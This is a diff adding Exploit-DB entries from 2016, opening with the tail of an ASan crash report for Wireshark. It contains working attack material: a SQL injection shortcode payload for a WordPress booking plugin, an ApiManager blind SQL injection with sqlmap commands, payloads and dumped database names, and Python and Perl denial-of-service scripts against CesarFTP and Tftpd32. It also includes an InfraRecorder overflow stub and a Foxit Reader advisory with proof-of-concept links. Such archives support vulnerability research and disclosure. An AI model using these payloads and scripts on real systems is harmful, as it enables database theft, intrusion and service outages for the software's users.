  0x0ffbf6ac0f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbf6ac0f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbf6ac0f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==6953==ABORTING
 --- cut ---
 The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11828. Attached are two files which trigger the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39327.zip
--- a/platforms/php/webapps/39319.txt
+++ b/platforms/php/webapps/39319.txt
@ -0,0 +1,77 @@
 # Exploit Title: WordPress appointment-booking-calendar <=1.1.23 - Shortcode SQL injection
 # Date: 2016-01-24
 # Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
 # Exploit Author: Joaquin Ramirez Martinez [i0 security-lab]
 # Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
 # Vendor: CodePeople.net
 # Vebdor URI: http://codepeople.net
 # Version: 1.1.23
 # OWASP Top10: A1-Injection
 # Tested on: windows 10 + firefox + sqlmap 1.0.
 ===================
 PRODUCT DESCRIPTION
 ===================
 "Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
 a calendar**. The booking form is linked to a **PayPal** payment process.
 You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
 where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
 that can be accepted for each time-slot."
 (copy of readme file)
 ======================
 EXPLOITATION TECHNIQUE
 ======================
 remote
 ==============
 SEVERITY LEVEL
 ==============
 critical
 ================================
 TECHNICAL DETAILS && DESCRIPTION
 ================================
 A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.20.
 The flaw was found in the function to run when a shortcode is found within a page in the wordpress site.
 The function mentioned use unsanitized attributes and a user authenticated as a editor, autor or 
 administrator (compromised) can exploit this vulnerability by adding crafted shortcodes on a page or post.
 The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, 
 an attacker can compromise the entire web server.
 ================
 PROOF OF CONCEPT
 ================
 An attacker(editor, autor or administrator) can embed into a post the following shortcode...
 [CPABC_APPOINTMENT_LIST calendar="-1 or sleep(10)#"]
 ... and the post will take ten seconds loading.
 ==========
 CREDITS
 ==========
 Vulnerability discovered by:
 	Joaquin Ramirez Martinez [i0 security-lab]
 	strparser[at]gmail[dot]com
 	https://www.facebook.com/I0-security-lab-524954460988147/
 	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
 ========
 TIMELINE
 ========
 2016-01-08 vulnerability discovered
 2016-01-24 reported to vendor
 2016-01-25 released appointment-booking-calendar 1.1.24
 2016-01-26 full disclosure
--- a/platforms/php/webapps/39320.txt
+++ b/platforms/php/webapps/39320.txt
@ -0,0 +1,48 @@
 gongwalker API Manager v1.1 - Blind SQL Injection
 # Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection
 # Date: 2016-01-25
 # Exploit Author: HaHwul
 # Exploit Author Blog: www.hahwul.com
 # Vendor Homepage: https://github.com/gongwalker/ApiManager
 # Software Link: https://github.com/gongwalker/ApiManager.git
 # Version: v1.1
 # Tested on: Debian
 # =================== Vulnerability Description =================== #
 Api Manager's index.php used tag parameters is vulnerable
 http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1
 # ========================= SqlMap Query ========================== #
 sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1" --level 4 --dbs --no-cast -p tag
 # ================= SqlMap Result(get My Test DB) ================= #
 Parameter: tag (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: act=api&tag=1' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 1 ELSE 0x28 END)) AND 'uUNb'='uUNb
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: act=api&tag=1' AND (SELECT * FROM (SELECT(SLEEP(5)))qakZ) AND 'cSPF'='cSPF
 ---
 [21:14:21] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux Ubuntu
 web application technology: Apache 2.4.10
 back-end DBMS: MySQL 5.0.11
 [21:14:21] [INFO] fetching database names
 [21:14:21] [INFO] fetching number of databases
 [21:14:21] [INFO] resumed: 25
 [21:14:21] [INFO] resumed: information_schema
 [21:14:21] [INFO] resumed: "
 [21:14:21] [INFO] resumed: ""
 [21:14:21] [INFO] resumed: '
 [21:14:21] [INFO] resumed: ''
 [21:14:21] [INFO] resumed: '''
 [21:14:21] [INFO] resumed: api
 [21:14:21] [INFO] resumed: blackcat
 [21:14:21] [INFO] resumed: edusec
 ...
--- a/platforms/windows/dos/39274.py
+++ b/platforms/windows/dos/39274.py
@ -0,0 +1,32 @@
 #!/usr/bin/env python
 #-*- coding:utf-8 -*-
 # Exploit Title     	: CesarFTP 0.99g -(XCWD)Remote BoF Exploit
 # Discovery by  	    	: Irving Aguilar
 # Email			: im.aguilar@protonmail.ch
 # Discovery Date    	: 18.01.2016
 # Tested Version    	: 0.99g
 # Vulnerability Type  : Denial of Service (DoS)
 # Tested on OS      	: Windows XP Professional SP3 x86 es
 import socket
 buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
 target = '192.168.1.73'
 port = 21
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 connect = s.connect((target, port))
 print '[*] Target: ' + target
 print '[*] Port: ' + str(port)
 s.recv(1024)
 s.send('USER ftp\r\n')
 s.recv(1024)
 s.send('PASS ftp\r\n')
 s.recv(1024)
 s.send( buffer  + '\r\n')
 print '[+] Buffer sent'
 s.close()
--- a/platforms/windows/dos/39329.py
+++ b/platforms/windows/dos/39329.py
@ -0,0 +1,29 @@
 source: http://www.securityfocus.com/bid/67076/info
 InfraRecorder is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
 Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.
 InfraRecorder 0.53 is vulnerable; other versions may also be affected. 
 #!/usr/bin/python
 # Exploit Title: InfraRecorder Unicode Buffer Overflow
 # Version: version 0.53
 # Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
 # Tested on: Windows XP sp2
 # Exploit Author: Osanda Malith 
 '''
 We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address
 you can build a successful exploit.
 '''
 '''
 Click Edit -> Import -> import our buffer
 '''
 junk = "A"*262
 nseh = "BB"
 seh = "CC"
 junk2 = "D"*20000
 file=open("Exploit.m3u","w")
 file.write(junk)
 file.close()
 #EOF
--- a/platforms/windows/dos/39330.txt
+++ b/platforms/windows/dos/39330.txt
@ -0,0 +1,66 @@
 #####################################################################################
 Application: Foxit Reader PDF Parsing Memory Corruption
 Platforms: Windows
 Versions: 7.2.8.1124 and earlier
 Author: Francis Provencher of COSIG
 Website: http://www.protekresearchlab.com/
 Twitter: @COSIG_
 #####################################################################################
 1) Introduction
 2) Report Timeline
 3) Technical details
 4) POC
 #####################################################################################
 ===============
 1) Introduction
 ===============
 Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
 (http://en.wikipedia.org/wiki/Foxit_Reader)
 #####################################################################################
 ============================
 2) Report Timeline
 ============================
 2015-12-18: Francis Provencher from Protek Research Lab’s found the issue;
 2016-01-02: Foxit Security Response Team confirmed the issue;
 2016-01-21: Foxit fixed the issue;
 #####################################################################################
 ============================
 3) Technical details
 ============================
 This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader.
 User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
 A specially crafted PDF can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability
 to execute arbitrary code under the context of the current process.
 #####################################################################################
 ===========
 4) POC
 ===========
 http://protekresearchlab.com/exploits/COSIG-2016-02.pdf
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39330.zip
 ###############################################################################
--- a/platforms/windows/dos/39331.pl
+++ b/platforms/windows/dos/39331.pl
@ -0,0 +1,35 @@
 source: http://www.securityfocus.com/bid/67404/info
 Tftpd32 and Tftpd64 are prone to denial-of-service vulnerabilities.
 An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, code-execution may be possible; however this has not been confirmed.
 The following products are vulnerable:
 Tftpd32 4.5
 Tftpd64 4.5
 #!/usr/bin/perl -w
 use IO::Socket;
 for (my $j = 0; $j < 2; $j++)
 {
    sleep(2);
    for (my $i = 0; $i < 1500; $i++)
    {
        $st_socket = IO::Socket::INET->new(Proto=>'udp', 
 PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
        $p_c_buffer = "\x0c\x0d" x 10;
        print $st_socket $p_c_buffer;
        close($st_socket);
        print "sent " . $i . "\n";
    }
 }
 exit;